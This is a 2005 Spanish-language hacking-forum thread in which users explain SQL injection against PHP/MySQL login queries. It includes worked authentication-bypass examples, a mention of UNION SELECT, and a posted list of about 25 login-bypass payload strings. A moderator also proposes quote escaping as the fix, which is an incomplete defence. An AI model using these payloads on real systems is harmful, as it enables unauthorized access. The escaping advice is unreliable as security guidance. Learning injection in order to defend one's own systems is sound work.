elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 13:20  


Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Intando aprender el mysql inyection		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Intando aprender el mysql inyection  (Leído 958 veces)
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Intando aprender el mysql inyection
« en: 10 Noviembre 2005, 23:06 »
Bueno pues estoy intentando aprender esto lo de mysql inyection.
Y creo haber conseguido aprender algo:
Citar
Select * From lista_usuarios Where usuario=$usuariorecibido and pass=$passenviado
Y entonces si ese algién nos envia:
$usuariorecibido = 'or 1=1--
Y el password = 'or 1=1--
Aunque no lo entiendo, yo en mis sistemas siempre pongo:
'$lavariable'
Entonces con eso ya no sería vulnerable??
Saludos   8)
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Intando aprender el mysql inyection
« Respuesta #1 en: 11 Noviembre 2005, 00:44 »
creo que lo haz entendido todo mal..
Código:
'Select * From lista_usuarios Where usuario=$usuariorecibido and pass=$passenviado'
con
Código:
$usuariorecibido= 123
$passenviado= algo'.' or "x"="x'.'"
el servidor recibe:
Código:
'Select * From lista_usuarios Where usuario=123 and pass=algo'.' or "x"="x'.'"'
y te permite el acceso como 123..

si tu sentencia es:

Código:
Select * From lista_usuarios Where usuario='$usuariorecibido' and pass='$passenviado'


al enviar:
Código:
$usuariorecibido= 123
$passenviado= ' or 'x'='x' --

el servidor recibe:

Código:
Select * From lista_usuarios Where usuario='123' and pass='' or 'x'='x' --'

el -- anula la ultima comilla.

te permite entrar como 123

Saludos
« Última modificación: 11 Noviembre 2005, 00:55 por Sirdarckcat » En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
Ertai
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.026


Ralph Wiggum


Ver Perfil
Re: Intando aprender el mysql inyection
« Respuesta #2 en: 12 Noviembre 2005, 11:55 »
Como te dice Sirdarckcat, no es el uso de las variables sino el hecho de no parsearlas debidamente.

Si cambias en una variable los ' por /' antes de usarla se te acaba el problema, aunque esta es la forma más básica de injección SQL.

Otra muuuuy conocida es la de usar el www.pagina.com/index.php?var=1 y cambiar el 1 por un UNION SELECT ..., y así encadenas los dos SQL query, aunque recuerda que para usar el UNION la primera query tiene que ser correcta, es decir, no puedes cortarla por la mitad... Ello implica el conocer las tablas.

Te recomiendo que leas un poco más, si quieres te doy unos cuantos que tengo por casa, estan francamente bien.

Saludos.
En línea
Si la felicidad se comprara, entonces el dinero sería noble.

Código:
void rotar_by_ref(int& a, int& b) {
   /* Quien dijo que no se podia sin una variable temporal? */
   *a = *a ^ *b;
   *b = *a ^ *b;
   *a = *a ^ *b;
}
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Intando aprender el mysql inyection
« Respuesta #3 en: 12 Noviembre 2005, 12:10 »
Cualquiera que me diga donde encontrar información muy bien explicadillo  :o, me interesa esto del mysql inyection  8)
Encontré en una web diferentes cadenas del Mysql inyection:
Citar
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi")or("a"="a
Aunque sin explicación no me vale para mucho. Usar una base de datos para registro para hacer un sistema en php se hacerlo asi que esta rama del mysql me parece interesante para que entre otras cosas defender mis sistemas ante posibles mysql inyection.
Saludos  ::)
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Tool]Mysql inyection generator.
Nivel Web 		volteo0101 2 889 Último mensaje 1 Marzo 2011, 00:00
por volteo0101
[ANSI C]Codigo fuente del generador de mysql inyection.
Programación C/C++ 		volteo0101 0 1,602 Último mensaje 28 Febrero 2011, 15:12
por volteo0101
duda con sql inyection[MYSQL]
Nivel Web 		afdlkglfgfdgfhgf 3 825 Último mensaje 21 Enero 2012, 11:18
por h3ct0r
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines